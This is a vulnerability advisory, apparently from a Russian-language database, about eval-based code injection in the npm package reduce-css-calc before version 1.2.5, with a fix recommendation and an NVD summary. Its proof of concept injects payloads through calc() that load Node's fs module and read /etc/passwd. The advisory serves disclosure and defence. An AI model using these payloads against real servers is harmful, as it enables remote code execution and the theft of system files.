Описание
Arbitrary Code Injection in reduce-css-calc
Affected versions of reduce-css-calc pass input directly to eval. If user input is passed into the calc function, this may result in cross-site scripting on the browser, or remote code execution on the server.
Proof of Concept
const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc( (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc( (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc( (fs['readFileSync']("/etc/passwd", "utf-8")))`));
Recommendation
Update to version 1.2.5 or later.
Пакеты
Наименование
reduce-css-calc
npm
Затронутые версииВерсия исправления
< 1.2.5
1.2.5
Связанные уязвимости
CVSS3: 6.1
nvd
больше 7 лет назад
Arbitrary code execution is possible in reduce-css-calc node module <=1.2.4 through crafted css. This makes cross sites scripting (XSS) possible on the client and arbitrary code injection possible on the server and user input is passed to the `calc` function.